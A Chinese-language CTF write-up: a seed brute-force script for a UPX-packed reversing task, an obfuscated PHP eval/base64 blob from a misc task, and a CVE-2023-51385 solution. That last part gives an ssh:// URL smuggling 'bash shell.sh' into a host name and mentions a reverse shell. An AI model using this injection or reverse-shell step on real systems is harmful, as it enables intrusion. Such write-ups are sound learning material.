2023年春秋杯网络安全联赛冬季赛 Writeup

re

upx2023

UPX改了标志。修复一下。脱壳。正常分析。

# 输入 flag00000000000000000000000000000000000000
# 得到 f0000000000lg0000000000000000000a000000000

c1 = 'f0000000000lg0000000000000000000a000000000'
print(c1.index('f'))
print(c1.index('l'))
print(c1.index('a'))
print(c1.index('g'))
# 0 f
# 11 l
# 12 g
# 32 a

爆破 seed

from ctypes import *
import datetime

enc = [0x09, 0x63, 0xD9, 0xF6, 0x58, 0xDD, 0x3F, 0x4C, 0x0F, 0x0B, 0x98, 0xC6, 0x65, 0x21,
       0x41, 0xED, 0xC4, 0x0B, 0x3A, 0x7B, 0xE5, 0x75, 0x5D, 0xA9, 0x31, 0x41, 0xD7, 0x52,
       0x6C, 0x0A, 0xFA, 0xFD, 0xFA, 0x84, 0xDB, 0x89, 0xCD, 0x7E, 0x27, 0x85, 0x13, 0x08]


def rand_win():
    return cdll.msvcrt.rand()


def rand_win_ff():
    return cdll.msvcrt.rand() % 0xff


def process(seed):
    cdll.msvcrt.srand(seed)
    lst_rand = []
    for i in range(42):
        lst_rand.append(rand_win_ff())
    if lst_rand[0] ^ enc[0] == ord('f'):
        if lst_rand[11] ^ enc[11] == ord('l'):
            print('1 get', seed)
            if lst_rand[12] ^ enc[12] == ord('g'):
                print('2 get', seed)
                if lst_rand[32] ^ enc[32] == ord('a'):
                    print('GET ------ ')
                    print(seed)
                    exit(0)


def bruteforce():
    date = datetime.datetime(2023, 4, 22)
    date_seed = int(date.timestamp())
    for seed in range(date_seed, date_seed + 1054099200, 1):
        process(seed)


bruteforce()

step 3

import sys
from ctypes import *
import datetime

enc = [0x00000009, 0x00000063, 0x000000D9, 0x000000F6, 0x00000058, 0x000000DD, 0x0000003F, 0x0000004C, 0x0000000F, 0x0000000B, 0x00000098, 0x000000C6, 0x00000065, 0x00000021,
       0x00000041, 0x000000ED, 0x000000C4, 0x0000000B, 0x0000003A, 0x0000007B, 0x000000E5, 0x00000075, 0x0000005D, 0x000000A9, 0x00000031, 0x00000041, 0x000000D7, 0x00000052,
       0x0000006C, 0x0000000A, 0x000000FA, 0x000000FD, 0x000000FA, 0x00000084, 0x000000DB, 0x00000089, 0x000000CD, 0x0000007E, 0x00000027, 0x00000085, 0x00000013, 0x00000008]
cdll.msvcrt.srand(1682145110)
def rand_win():
    return cdll.msvcrt.rand() % 255

for i, c in enumerate(enc):
    print(chr(rand_win() ^ c), end='')

# f{52bgb-281lg00ff-46f7-ca009c8e}a381-b7191
# cyberchef railfences f, key=3

Misc

_明文混淆

找个 35821 大小的 LICENSE.txt

bkcrack明文解出来。

<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};
$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};
$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};
$OO0000=$O00OO0{7}.$O00OO0{13};
$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("JE8wTzAwMD0idVNxTHlDandXcFpIaGlLbWZGR1ZUQmFOcllvSXpsZWd4Sk1iUkRVRUFrUWN0bnZzZE9QWGladnVUYWdmY0hiWFloZVdNeUtObEx3U2pvQ25ydEFCeE9RRHNKcGRrUG1JekdFVlJVRnFGSjlmd1hrZWJxYllEYVlHQVd0aWJXeFlSS3BDb1d5cmJsbzBxMnN0bzI5UGJaQkdObExHUnlRNEF0T2dzUFNlc2E5THBkc0VEeVJwVVhzZU5kVjRScDVyUjNtNHNkUkZJR0hPSTJ0bmJQdGxTS3oybEdIYkFHSE53Z3k1TlBiTk5QejROV0M1TnJMMElXU2RtcGQ5RlpJSGVaUDdua0MvRkI9PSI7ZXZhbCgnPz4nLiRPMDBPME8oJE8wT08wMCgkT08wTzAwKCRPME8wMDAsJE9PMDAwMCoyKSwkT08wTzAwKCRPME8wMDAsJE9PMDAwMCwkT08wMDAwKSwkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs="));

?>

随便解下base64即可。

_modules

OpenSSH ProxyCommand命令注入漏洞（CVE-2023-51385）附验证方法

照着改一下。
url = ssh://bash shell.shfoo.example.com/bar

shell.sh中反弹shell即可。